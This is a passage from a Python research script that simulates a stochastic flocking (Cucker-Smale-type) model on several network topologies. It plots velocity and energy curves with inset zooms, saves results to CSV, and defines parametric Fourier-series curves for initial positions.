cut_sign=1
plotlen=abs(np.min(Vcum[1:,:,0,0]))/(abs(np.max(Vcum[1:,:,0,0]))+abs(np.min(Vcum[1:,:,0,0])))
else :
# ax_cut=int(np.median(np.argmin(Vcum[1:,:,0,0],axis=1)))
cut_sign=-1
plotlen=abs(np.max(Vcum[1:,:,0,0]))/(abs(np.max(Vcum[1:,:,0,0]))+abs(np.min(Vcum[1:,:,0,0])))
# ax_ycut=np.max(Vcum[1:,ax_cut,0,0])
# ax_ycut2=np.min(Vcum[1:,ax_cut,0,0])
# # print(np.argmax(Vcum[1:,:,0,0],axis=1))
# # print(Vcum[1,:,0,0])
# # print(Vcum[2,:,0,0])
# # print(Vcum[3,:,0,0])
# print("ax_ycut : %f" %ax_ycut)
# print("ax_ycut2 : %f" %ax_ycut2)
# lar_len=min(12*(ax_ycut-ax_ycut2),abs(ax_ycut)*0.3)
# cutunit=3
# print("ax_cut : %d" %ax_cut)
# print("lar_len : %.2f" %lar_len)
# # select=0
# # bounded_l=ax_cut
# # bounded_r=T-1
# # ccut=ax_cut*3+50
# # while select==0 :
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))>lar_len :
# # bounded_r=ccut
# # ccut=int((bounded_l+ccut)/2)
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))<lar_len :
# # bounded_l=ccut
# # ccut=int((bounded_r+ccut)/2)
# # if bounded_r-bounded_l<cutunit:
# # select=1
# # ax_rightcut=min(int(ax_cut*4),bounded_r+1)
# # print("bound l : %d" %bounded_l)
# # print("bound r : %d" %bounded_r)
# # print("ax_rightcut : %d" %ax_rightcut)
# # select=0
# # bounded_l=0
# # bounded_r=ax_cut
# # ccut=int(ax_cut*0.5)
# # while select==0 :
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))>lar_len :
# # bounded_l=ccut
# # ccut=int((bounded_r+ccut)/2)
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))<lar_len :
# # bounded_r=ccut
# # ccut=int((bounded_l+ccut)/2)
# # if bounded_r-bounded_l<cutunit:
# # select=1
# # ax_leftcut=max(bounded_l,int(ax_cut-(ax_rightcut-ax_cut)),0)
# # print("bound l : %d" %bounded_l)
# # print("bound r : %d" %bounded_r)
# # print("ax_leftcut : %d" %ax_leftcut)
below=0.1
if T>900 :
enlarge_len=6
else :
enlarge_len=3
I_start=range(0,T-enlarge_len)
ratio=np.zeros(T-enlarge_len)
for i in I_start:
ratio[i] = sto_ratio(i,i+enlarge_len,below*ax_max)
ax_leftcut=np.argmax(ratio)
ax_rightcut=ax_leftcut+enlarge_len
print("ax_leftcut : %d" %ax_leftcut)
print("cut_sign : %d" %cut_sign)
print("plotlen : %.2f" %plotlen )
ax_larged=inset_axes(axes,"100%","100%",bbox_to_anchor=[0.9-0.35,0.05+(0.1+plotlen)*(1+cut_sign)/2,0.08+0.35,0.8-plotlen+0.02*(cut_sign-1)/2],bbox_transform=axes.transAxes,borderpad=0) #x축 시작 위치, y축 시작 위치, 너비, 높이
for i in range(Trial) :
ax_larged.plot(np.array(range(ax_leftcut,ax_rightcut))*h,Vcum[i+1,ax_leftcut:ax_rightcut,0,0],linewidth=0.3, alpha=0.5)
# ax_larged.set_xticks([])
ax_larged.set_yticks([])
# ax_larged.set_ylim(bottom=np.max(Vcum[:,ax_leftcut:ax_rightcut,0,0])-lar_len*1.5,top=np.max(Vcum[:,ax_leftcut:ax_rightcut,0,0])+lar_len*0.05)
# ax_larged.set_ylim(bottom=np.max(Vcum[:,ax_cut,0,0])-lar_len*1.5,top=np.max(Vcum[:,ax_cut,0,0])+lar_len*0.05)
my_mark_inset(axes,ax_larged,loc1a=2,loc1b=1,loc2a=3,loc2b=4,fc="none",ec="0.2",boxlw=0.6,connectlw=0.4) #우상부터 반시계로 1~4
axes.set_xlabel('t')
axes.set_ylabel('velocity',rotation=90)
saveplot(2,plotsave)
# plot3 : graph of E(Vnrm)
fig=plt.figure(constrained_layout=True,figsize=fig_size)
spec=gridspec.GridSpec(ncols=18,nrows=6,figure=fig)
EVnrm=np.mean(Vnrmcum[1:],axis=0)
EphE=np.mean(phEcum[1:],axis=0)
VVnrmcum=np.sort(Vnrmcum[1:],axis=0)
E0=EVnrm[0]+EphE[0]
SupVnrm=max(np.max(VVnrmcum[int(Trial*0.9),:]), np.max(EVnrm))
print (EVnrm)
scale_const=int(np.log10(E0))
scale=10**(-scale_const)
if E0>= SupVnrm:
cx_up=fig.add_subplot(spec[:2,:])
cx_down=fig.add_subplot(spec[2:,:])
# cx_down.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
cx_up.plot(np.array(range(0,T))*h,EVnrm*scale,linewidth=0.7,alpha=0.8,label=r'$\mathrm{\mathbb{E}}\Vert {\bf v}_t \Vert$')
cx_up.plot(np.array(range(0,T))*h,[E0*scale for tt in range(T)],linewidth=0.5,c='gold',label=r'$E_0$',ls='--')
cx_up.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',label=r'$E_0-E^{\phi}_t$',ls='-.')
cx_up.plot(np.array(range(0,T))*h,(EphE+EVnrm)*scale, alpha=0.8,linewidth=0.5,c='firebrick',label=r'$E_t$',ls=':')
# cx_up.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median of ')
# cx_up.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx_down.plot(np.array(range(0,T))*h,EVnrm*scale,linewidth=0.95,alpha=0.8,label=r'$\mathrm{\mathbb{E}}$')
cx_down.plot(np.array(range(0,T))*h,[E0*scale for tt in range(T)],linewidth=0.5,c='gold')
cx_down.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',ls='-.')
cx_down.plot(np.array(range(0,T))*h,(EphE+EVnrm)*scale, alpha=0.8,linewidth=0.5,c='firebrick',ls=':')
# cx_down.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median')
# cx_down.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx_up.set_ylim(0.9*E0*scale,E0*scale*1.01)
# cxcut=E0-min(EphE[np.argmax(VVnrmcum[int(Trial*0.9),:])], EphE[np.argmax(EVnrm)])
cx_top=SupVnrm*1.2*scale
# cx_bottom=min(np.min(VVnrmcum[0,:])*(-0.5),SupVnrm*(-0.05))*scale
cx_bottom=-0.001*2
cx_down.set_ylim(bottom=cx_bottom,top=cx_top)
# cx_down.set_ylim(top=cxcut*1.2)
cx_up.legend(fontsize=9.5*0.83,loc='best')
# cx_down.legend(fontsize=10,loc='best')
cx_up.spines['bottom'].set_visible(False)
cx_down.spines['top'].set_visible(False)
cx_up.xaxis.set_visible(False)
cx_down.xaxis.tick_bottom()
cx_up.set_xlim(right=(T-2)*h, left=-.01/9)
cx_down.set_xlim(right=(T-2)*h,left=-.01/9)
axes=cx_down
d = .004 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=cx_up.transAxes, color='k', clip_on=False,lw=0.8)
curvyline_x=np.linspace(-d,1+d,250)
curvyline_y=1.5*2*d*np.sin(2*np.pi/d*8*curvyline_x)
cx_up.plot(curvyline_x,curvyline_y, **kwargs) # top-left diagonal
kwargs.update(transform=cx_down.transAxes) # switch to the bottom axes
cx_down.plot(curvyline_x, 1+0.7*curvyline_y, **kwargs) # bottom-right diagonal
cx_up.annotate(r'$\times$10$^{%i}$' %(scale_const),xy=(0.003,0.83),xycoords='axes fraction')
#축의 가ㅄ 표시 형식 -> 이것 저것 해보다가 결국 수동으로 하기로
#https://stackoverflow.com/questions/39620700//positioning-the-exponent-of-tick-labels-when-using-scientific-notation-in-matplo
else :
cx=fig.add_subplot(spec[:,:])
# cx.set_title(r'$\mathrm{\mathbb{E}}||v(t)||^2$')
# cx.set_xlabel('K=%.2f,M=%.2f, sigma=%.2f' %(K,M,L))
cx.plot(np.array(range(0,T))*h,EVnrm,linewidth=0.7,alpha=0.8,label=r'$\mathrm{\mathbb{E}}||v||$')
cx.plot(np.array(range(0,T))*h,[E0 for tt in range(T)],linewidth=0.5,c='gold',label=r'$E_0$')
cx.plot(np.array(range(0,T))*h,E0-EphE, alpha=0.8,linewidth=0.5,c='forestgreen',label=r'$E_0-E^{\phi}_t$',ls='-.')
cx.plot(np.array(range(0,T))*h,EphE+EVnrm, alpha=0.8,linewidth=0.5,c='firebrick',label=r'$E_t$',ls=':')
# cx.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median')
# cx.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx.legend(fontsize=10,loc='best')
cx_top=E0
cx_bottom=-0.001
axes=cx
plotlen=abs(np.min(EVnrm))/(E0+abs(np.min(EVnrm)))
cx_larged=inset_axes(axes,"100%","100%",bbox_to_anchor=[0.7,plotlen+0.15,0.28,0.8-plotlen],bbox_transform=axes.transAxes,borderpad=0) #x축 시작 위치, y축 시작 위치, 너비, 높이
cx_larged.plot(np.array(range(0,T))*h,EVnrm*scale,label=r'$\mathrm{\mathbb{E}}$')
cx_larged.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',label=r'$E_0-E_\phi(t)$',ls='-.')
# cx_larged.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7)
# cx_larged.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7)
# cx_rightcut=np.argmax(EVnrm)
cx_rightcut=int(T/250*3)
# cx_larged.set_ylim(bottom=min(np.min(VVnrmcum[0,:])*(-0.5),SupVnrm*(-0.01)),top=SupVnrm*1.05)
# cx_larged.set_ylim(bottom=min(np.min(VVnrmcum[0:cx_rightcut])*(-0.5),np.max(EVnrm[0:cx_rightcut])*(-0.1)),top=(E0-np.min(EphE[:int(cx_rightcut*1.05)]))*0.65)
# cx_larged.set_ylim(bottom=max(cx_bottom,np.max(EVnrm[:int(cx_rightcut*1.05)+1])*(-0.025)*scale),top=min(scale*((E0-np.min(EphE[:int(cx_rightcut*1.05)+1]))*0.35+np.max(EVnrm[0:int(cx_rightcut*1.05)+1])*0.65),cx_top*0.9))
cx_larged.set_ylim(bottom=max(cx_bottom,np.min(EVnrm[:int(cx_rightcut*1.05)+1])*scale),top=min(scale*((E0-np.min(EphE[:int(cx_rightcut*1.05)+1]))*0.35+np.max(EVnrm[0:int(cx_rightcut*1.05)+1])*0.65),cx_top*0.9))
# cx_larged.set_xlim(left=cx_rightcut*(-0.05)*h,right=cx_rightcut*1.05*h)
cx_larged.set_xlim(left=0,right=cx_rightcut*1.05*h)
# cx_larged.legend(fontsize=5,loc='best')
cx_larged.set_yticks([])
my_mark_inset(axes,cx_larged,loc1a=2,loc1b=1,loc2a=3,loc2b=4,fc="none",ec="0.2",boxlw=0.4,connectlw=0.3) #우상부터 반시계로 1~4
axes.set_xlabel('t')
saveplot(3,plotsave)
## dx : graph of H(x,v)
fig=plt.figure(figsize=fig_size)
Hxv=np.mean(Xbnrmcum[1:]+Vnrmcum[1:],axis=0)
plt.plot(np.array(range(0,T))*h,Hxv)
axes=plt.axes()
axes.set_xlim(left=0,right=(T-2)*h)
axes.set_ylim(bottom=-0.001*2400)
axes.set_xlabel('t')
axes.set_yscale('log')
saveplot(4,plotsave)
#fig.tight_layout()
def my_mark_inset(parent_axes, inset_axes, loc1a=1, loc1b=1, loc2a=2, loc2b=2,boxlw=0.5,connectlw=0.5, **kwargs):
rect = TransformedBbox(inset_axes.viewLim, parent_axes.transData)
pp = BboxPatch(rect, fill=False,lw=boxlw, **kwargs)
parent_axes.add_patch(pp)
p1 = BboxConnector(inset_axes.bbox, rect, loc1=loc1a, loc2=loc1b,lw=connectlw, **kwargs)
inset_axes.add_patch(p1)
p1.set_clip_on(False)
p2 = BboxConnector(inset_axes.bbox, rect, loc1=loc2a, loc2=loc2b,lw=connectlw, **kwargs)
inset_axes.add_patch(p2)
p2.set_clip_on(False)
return pp, p1, p2
def saveplot(plotnum,save) :
if save!=0 :
# plt.savefig('graph_k%.2fm%.2fs%.4fnet%d.%d.%dN%dpsLB%.2fphLB%.2ftrial%dh%.5f-%d.pdf' %(K,M,L,nettype[0],nettype[1],nettype[2],N,psLB,phLB,Trial,h,plotnum),dpi=2000,bbox_inches='tight',pad_inches=0.02)
if plotnum == 2 :
plt.savefig('graph_k%.1fm%.1fs%.5fnet%d.%d.%dN%d-%d.eps' %(K,M,L,nettype[0],nettype[1],nettype[2],N,plotnum),dpi=3000,bbox_inches='tight',pad_inches=0.02)
plt.savefig('graph_k%.1fm%.1fs%.5fnet%d.%d.%dN%d-%d.pdf' %(K,M,L,nettype[0],nettype[1],nettype[2],N,plotnum),dpi=3000,bbox_inches='tight',pad_inches=0.02)
print("image saved_%d" %plotnum)
else :
plt.show()
def savedata(savemode) :
## savemode==1 : save just outlier data and initial setting
## savemode==2 : save all data and initial setting
## savemode==0 : don't save
if savemode==1 :
print("data reshaping")
selP = Pcum[selI,:,:,:].reshape(-1,T*N*2)
selV = Vcum[selI,:,:,:].reshape(-1,T*N*2)
selVnrm = Vnrmcum[selI,:]
selXbnrm = Xbnrmcum[selI,:]
seldB = dBcum[selI,:]
selP_df=pd.DataFrame(selP)
selV_df=pd.DataFrame(selV)
selVnrm_df=pd.DataFrame(selVnrm)
selXbnrm_df=pd.DataFrame(selXbnrm)
seldB_df=pd.DataFrame(seldB)
selcount_df=pd.DataFrame(selcount)
print("saving...")
selP_df.to_csv('selP_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selV_df.to_csv('selV_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selVnrm_df.to_csv('selVnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selXbnrm_df.to_csv('selXbnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
seldB_df.to_csv('seldB_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selcount_df.to_csv('selcount_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
elif savemode==2 :
print("data reshaping")
reP = Pcum.reshape(-1,T*N*2)
reV = Vcum.reshape(-1,T*N*2)
redB = dBcum.reshape(-1,T*2)
P_df=pd.DataFrame(reP)
V_df=pd.DataFrame(reV)
dBcum_df=pd.DataFrame(redB)
Vnrm_df=pd.DataFrame(Vnrmcum)
Xbnrm_df=pd.DataFrame(Xbnrmcum)
phE_df=pd.DataFrame(phEcum)
print("saving...")
P_df.to_csv('P_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
V_df.to_csv('V_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Vnrm_df.to_csv('Vnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Xbnrm_df.to_csv('Xbnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
phE_df.to_csv('phE_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
dBcum_df.to_csv('dBcum_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
# setting 을 df로 만들어서 입출력 편하게 저장하는 법 확인하기.
# dB, Pinit, Vinit, Z, A
if savemode!=0 :
variables=['N','alpha','beta','psLB','phLB','K','M','L','T','h','Trial','cut','nettype','curvetype','version']
setting={}
for index in variables:
setting[index]=globals()[index]
setting_df = pd.DataFrame(setting)
Pinit_df=pd.DataFrame(Pinit)
Vinit_df=pd.DataFrame(Vinit)
Z_df=pd.DataFrame(Z)
A_df=pd.DataFrame(A)
setting_df.to_csv('setting_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Pinit_df.to_csv('Pinit_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Vinit_df.to_csv('Vinit_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Z_df.to_csv('Z_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
A_df.to_csv('A_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
def makenet(net_type):
A=np.zeros((N,N))
if net_type==0 :
A[:,:]=1
for i in range(N) :
A[i,i]=0
elif net_type==1 :
for i in range(N-1) :
A[i,i+1] = 1
A[0,1:N]=1
A[0:int(N/2)-1,int(N/2)-1]=1
A[int(N/2)-1,int(N/2):N]=1
A[:N-1,N-1]=1
A=A+A.T
elif net_type==2 :
for i in range(N-1) :
A[i,i+1] = 1
A=A+A.T
elif net_type==3 :
if N % 2 != 0 :
step=2
elif N % 4 == 0 :
step=N/2-1
else :
step=N/2-2
for i in range(N) :
A[i,int((i+step)%N)]=1
A[i,int((i-step)%N)]=1
elif net_type==4 :
for i in range(N-1) :
A[i,i+1] = 1
A=A+A.T
for i in range(int(N/10)) :
A[i*10,:]=1
A[:,i*10]=1
A[i*10,i*10]=0
elif net_type==5 :
for i in range(N-1) :
A[i,i+1] = 1
A[N-1,0]=1
A=A+A.T
return A
def phiEest(ssq,b,LB):
phE=(np.power(1+ssq,1-b)-1)/(1-b)+ssq*LB
return phE
def psi(s,b,LB):
a = np.power((1+s),-b) + LB
return a
def csmpf(X,V):
Kem=np.zeros((N,2))
for i in range(N):
J= A_ps[i,:] == 1
s=(np.power(X[i][0]-X[:,0],2)+np.power(X[i][1]-X[:,1],2))[J]
ps=psi(s,alpha,psLB)
a=np.sum((V[J]-V[i])*np.array([ps]).T,axis=0) * K
#행렬의 각 행별로 array에 저장된 scalar를 곱하려고 하려면 dimension이 같아야함
#즉 여기선 n*2 행렬이 있고 거기에서 각각의 행에 곱할 scalar가 ps에 저장되어 있는데,
#1dimension으로 n짜리 array로는 못하고, n*1 사이즈의 2차원 행렬이어야 함.
# a/=N
J= A_ph[i,:] == 1
u=np.array([0.0,0.0])
ss=(np.power(X[i][0]-Z[i][0]-X[:,0]+Z[:,0],2)+np.power(X[i][1]-Z[i][1]-X[:,1]+Z[:,1],2))[J]
pss=psi(ss,beta,phLB)
u=np.sum((X[J]-Z[J]-X[i]+Z[i])*np.array([pss]).T,axis=0) * M
a+=u
Kem[i]=a
Kem=np.nan_to_num(Kem)
return Kem
def brown(V) :
W=np.zeros((N,2))
for i in range(N) :
J= A_b[i,:]==1
W[i]=np.sum((V[J]-V[i]))*L
return W
def dW(dt) :
return np.random.normal(0,np.sqrt(dt))
def theta(x):
a=np.heaviside(x,0)
return a
def Curve (dom) :
num=N
if jump==1:
num*=2
t=np.linspace(0,dom,num,endpoint=False)
if curvename=='circle':
X = np.cos(t)
Y = np.sin(t)
elif curvename=='pi':
X = 17/31 *np.sin(235/57 - 32 *t) + 19/17 *np.sin(192/55 - 30 *t) + 47/32 *np.sin(69/25 - 29 *t) + 35/26 *np.sin(75/34 - 27 *t) + 6/31 *np.sin(23/10 - 26 *t) + 35/43 *np.sin(10/33 - 25 *t) + 126/43 *np.sin(421/158 - 24 *t) + 143/57 *np.sin(35/22 - 22 *t) + 106/27 *np.sin(84/29 - 21 *t) + 88/25 *np.sin(23/27 - 20 *t) + 74/27 *np.sin(53/22 - 19 *t) + 44/53 *np.sin(117/25 - 18 *t) + 126/25 *np.sin(88/49 - 17 *t) + 79/11 *np.sin(43/26 - 16 *t) + 43/12 *np.sin(41/17 - 15 *t) + 47/27 *np.sin(244/81 - 14 *t) + 8/5 *np.sin(79/19 - 13 *t) + 373/46 *np.sin(109/38 - 12 *t) + 1200/31 *np.sin(133/74 - 11 *t) + 67/24 *np.sin(157/61 - 10 *t) + 583/28 *np.sin(13/8 - 8 *t) + 772/35 *np.sin(59/16 - 7 *t) + 3705/46 *np.sin(117/50 - 6 *t) + 862/13 *np.sin(19/8 - 5 *t) + 6555/34 *np.sin(157/78 - 3 *t) + 6949/13 *np.sin(83/27 - t) - 6805/54 *np.sin(2 *t + 1/145) - 5207/37 *np.sin(4 *t + 49/74) - 1811/58 *np.sin(9 *t + 55/43) - 63/20 *np.sin(23 *t + 2/23) - 266/177 *np.sin(28 *t + 13/18) - 2/21 *np.sin(31 *t + 7/16)
Y = 70/37 *np.sin(65/32 - 32 *t) + 11/12 *np.sin(98/41 - 31 *t) + 26/29 *np.sin(35/12 - 30 *t) + 54/41 *np.sin(18/7 - 29 *t) + 177/71 *np.sin(51/19 - 27 *t) + 59/34 *np.sin(125/33 - 26 *t) + 49/29 *np.sin(18/11 - 25 *t) + 151/75 *np.sin(59/22 - 24 *t) + 52/9 *np.sin(118/45 - 22 *t) + 52/33 *np.sin(133/52 - 21 *t) + 37/45 *np.sin(61/14 - 20 *t) + 143/46 *np.sin(144/41 - 19 *t) + 254/47 *np.sin(19/52 - 18 *t) + 246/35 *np.sin(92/25 - 17 *t) + 722/111 *np.sin(176/67 - 16 *t) + 136/23 *np.sin(3/19 - 15 *t) + 273/25 *np.sin(32/21 - 13 *t) + 229/33 *np.sin(117/28 - 12 *t) + 19/4 *np.sin(43/11 - 11 *t) + 135/8 *np.sin(23/10 - 10 *t) + 205/6 *np.sin(33/23 - 8 *t) + 679/45 *np.sin(55/12 - 7 *t) + 101/8 *np.sin(11/12 - 6 *t) + 2760/59 *np.sin(40/11 - 5 *t) + 1207/18 *np.sin(21/23 - 4 *t) + 8566/27 *np.sin(39/28 - 3 *t) + 12334/29 *np.sin(47/37 - 2 *t) + 15410/39 *np.sin(185/41 - t) - 596/17 *np.sin(9 *t + 3/26) - 247/28 *np.sin(14 *t + 25/21) - 458/131 *np.sin(23 *t + 21/37) - 41/36 *np.sin(28 *t + 7/8)
elif curvename=='b.simpson':
X = ((-5/37 *np.sin(61/42 - 8 *t) - 112/41 *np.sin(36/23 - 7 *t) - 62/37 *np.sin(14/9 - 6 *t) - 31/7 *np.sin(69/44 - 5 *t) - 275/13 *np.sin(47/30 - 3 *t) - 23/38 *np.sin(48/31 - 2 *t) + 461/10 *np.sin(t + 107/68) + 8/23 *np.sin(4 *t + 179/38) - 2345/18) *np.heaviside(71 *np.pi - t,0.5) *np.heaviside(t - 67 *np.pi,0.5) + (-41/74 *np.sin(112/75 - 17 *t) - 274/37 *np.sin(17/11 - 11 *t) - 907/30 *np.sin(36/23 - 5 *t) + 623/15 *np.sin(t + 47/30) + 684/29 *np.sin(2 *t + 212/45) + 3864/25 *np.sin(3 *t + 63/40) + 1513/78 *np.sin(4 *t + 19/12) + 269/45 *np.sin(6 *t + 14/9) + 66/25 *np.sin(7 *t + 155/33) + 121/35 *np.sin(8 *t + 27/17) + 44/13 *np.sin(9 *t + 35/22) + 71/7 *np.sin(10 *t + 30/19) + 87/40 *np.sin(12 *t + 57/37) + 61/62 *np.sin(13 *t + 47/28) + 43/65 *np.sin(14 *t + 31/20) + 54/37 *np.sin(15 *t + 127/27) + 56/27 *np.sin(16 *t + 30/19) + 11843/35) *np.heaviside(67 *np.pi - t,0.5) *np.heaviside(t - 63 *np.pi,0.5) + (-119/55 *np.sin(65/43 - 13 *t) - 78/11 *np.sin(82/55 - 12 *t) - 25/31 *np.sin(36/23 - 11 *t) - 70/9 *np.sin(31/20 - 9 *t) - 707/65 *np.sin(47/30 - 7 *t) - 953/22 *np.sin(45/29 - 5 *t) + 962/15 *np.sin(t + 113/72) + 1091/30 *np.sin(2 *t + 212/45) + 3177/26 *np.sin(3 *t + 27/17) + 1685/22 *np.sin(4 *t + 43/27) + 143/27 *np.sin(6 *t + 49/32) + 203/27 *np.sin(8 *t + 27/17) + 411/37 *np.sin(10 *t + 50/31) + 65/27 *np.sin(14 *t + 33/20) + 8/19 *np.sin(15 *t + 13/7) + 3/11 *np.sin(16 *t + 43/33) - 11597/35) *np.heaviside(63 *np.pi - t,0.5) *np.heaviside(t - 59 *np.pi,0.5) + (-1/7 *np.sin(41/81 - 30 *t) - 8/27 *np.sin(3/28 - 28 *t) - 10/23 *np.sin(3/26 - 26 *t) + 2377/13 *np.sin(t + 33/28) + 43/15 *np.sin(2 *t + 26/7) + 131/18 *np.sin(3 *t + 3/25) + 45/41 *np.sin(4 *t + 105/32) + 43/14 *np.sin(5 *t + 87/23) + 135/136 *np.sin(6 *t + 51/20) + 51/14 *np.sin(7 *t + 118/43) + 19/18 *np.sin(8 *t + 23/18) + 49/23 *np.sin(9 *t + 25/12) + 14/19 *np.sin(10 *t + 63/55) + 54/49 *np.sin(11 *t + 68/41) + 32/37 *np.sin(12 *t + 30/29) + 5/12 *np.sin(13 *t + 43/24) + 34/45 *np.sin(14 *t + 15/17) + 13/30 *np.sin(15 *t + 67/23) + 21/31 *np.sin(16 *t + 43/60) + 25/62 *np.sin(17 *t + 89/34) + 9/20 *np.sin(18 *t + 11/26) + 4/17 *np.sin(19 *t + 55/28) + 26/51 *np.sin(20 *t + 4/17) + 2/33 *np.sin(21 *t + 247/62) + 14/31 *np.sin(22 *t + 9/44) + 5/26 *np.sin(23 *t + 113/34) + 9/17 *np.sin(24 *t + 3/10) + 4/25 *np.sin(25 *t + 99/32) + 6/23 *np.sin(27 *t + 548/183) + 10/33 *np.sin(29 *t + 129/37) + 5/12 *np.sin(31 *t + 127/39) - 9719/87) *np.heaviside(59 *np.pi - t,0.5) *np.heaviside(t - 55 *np.pi,0.5) + (228/65 *np.sin(t + 116/33) + 353/40 *np.sin(2 *t + 33/19) + 107/24 *np.sin(3 *t + 58/33) + 58/21 *np.sin(4 *t + 519/130) + 19/15 *np.sin(5 *t + 45/37) + 13/12 *np.sin(6 *t + 145/38) + 43/42 *np.sin(7 *t + 25/99) + 11/19 *np.sin(8 *t + 105/44) + 203/19) *np.heaviside(55 *np.pi - t,0.5) *np.heaviside(t - 51 *np.pi,0.5) + (-23/10 *np.sin(22/17 - 4 *t) - 159/17 *np.sin(156/125 - 3 *t) + 523/112 *np.sin(t + 80/21) + 111/23 *np.sin(2 *t + 25/24) + 92/79 *np.sin(5 *t + 57/32) + 58/37 *np.sin(6 *t + 159/35) + 18/31 *np.sin(7 *t + 27/43) - 7563/28) *np.heaviside(51 *np.pi - t,0.5) *np.heaviside(t - 47 *np.pi,0.5) + (-76/17 *np.sin(42/41 - 14 *t) - 154/31 *np.sin(37/38 - 11 *t) + 10820/41 *np.sin(t + 25/34) + 1476/31 *np.sin(2 *t + 36/19) + 595/12 *np.sin(3 *t + 67/43) + 3568/67 *np.sin(4 *t + 282/77) + 974/59 *np.sin(5 *t + 40/19) + 427/18 *np.sin(6 *t + 47/25) + 454/23 *np.sin(7 *t + 20/27) + 41/40 *np.sin(8 *t + 9/2) + 139/22 *np.sin(9 *t + 99/26) + 276/37 *np.sin(10 *t + 37/29) + 113/25 *np.sin(12 *t + 61/30) + 37/29 *np.sin(13 *t + 37/31) + 51/19 *np.sin(15 *t + 127/34) + 115/72 *np.sin(16 *t + 7/38) + 162/43 *np.sin(17 *t + 67/21) + 26/33 *np.sin(18 *t + 194/45) - 3614/99) *np.heaviside(47 *np.pi - t,0.5) *np.heaviside(t - 43 *np.pi,0.5) + (347/17 *np.sin(t + 3/13) + 9951/41) *np.heaviside(43 *np.pi - t,0.5) *np.heaviside(t - 39 *np.pi,0.5) + (760/29 *np.sin(t + 23/25) - 6059/28) *np.heaviside(39 *np.pi - t,0.5) *np.heaviside(t - 35 *np.pi,0.5) + (-106/41 *np.sin(7/13 - 18 *t) - 55/38 *np.sin(13/29 - 16 *t) - 173/19 *np.sin(34/29 - 7 *t) - 484/31 *np.sin(13/16 - 5 *t) - 1193/17 *np.sin(97/83 - 2 *t) + 6885/26 *np.sin(t + 41/48) + 99/5 *np.sin(3 *t + 5/16) + 751/36 *np.sin(4 *t + 73/18) + 129/40 *np.sin(6 *t + 83/18) + 327/31 *np.sin(8 *t + 17/23) + 498/47 *np.sin(9 *t + 123/88) + 298/49 *np.sin(10 *t + 54/25) + 82/15 *np.sin(11 *t + 153/35) + 106/27 *np.sin(12 *t + 3/32) + 171/43 *np.sin(13 *t + 433/173) + 36/11 *np.sin(14 *t + 98/33) + 39/22 *np.sin(15 *t + 97/25) + 68/37 *np.sin(17 *t + 157/34) - 227/29) *np.heaviside(35 *np.pi - t,0.5) *np.heaviside(t - 31 *np.pi,0.5) + (-2/15 *np.sin(66/47 - 14 *t) - 45/23 *np.sin(5/9 - 11 *t) - 151/43 *np.sin(13/32 - 8 *t) - 31/36 *np.sin(24/19 - 7 *t) + 2121/32 *np.sin(t + 45/38) + 2085/47 *np.sin(2 *t + 299/88) + 1321/43 *np.sin(3 *t + 72/25) + 557/37 *np.sin(4 *t + 74/21) + 205/17 *np.sin(5 *t + 27/23) + 13/9 *np.sin(6 *t + 113/32) + 35/17 *np.sin(9 *t + 7/22) + 93/26 *np.sin(10 *t + 112/25) + 11/14 *np.sin(12 *t + 58/17) + 8/15 *np.sin(13 *t + 47/30) + 33/20 *np.sin(15 *t + 32/25) + 31/94 *np.sin(16 *t + 192/59) + 35/31 *np.sin(17 *t + 51/77) + 9473/34) *np.heaviside(31 *np.pi - t,0.5) *np.heaviside(t - 27 *np.pi,0.5) + (-33/29 *np.sin(27/55 - 12 *t) + 388/13 *np.sin(t + 5/13) + 2087/30 *np.sin(2 *t + 193/55) + 1311/49 *np.sin(3 *t + 133/30) + 993/41 *np.sin(4 *t + 134/31) + 175/17 *np.sin(5 *t + 73/29) + 83/23 *np.sin(6 *t + 28/33) + 9/19 *np.sin(7 *t + 73/36) + 101/32 *np.sin(8 *t + 57/28) + 51/25 *np.sin(9 *t + 106/39) + 47/28 *np.sin(10 *t + 129/47) + 17/29 *np.sin(11 *t + 33/17) + 27/22 *np.sin(13 *t + 155/86) + 108/65 *np.sin(14 *t + 8/27) + 9/16 *np.sin(15 *t + 44/13) + 11/14 *np.sin(16 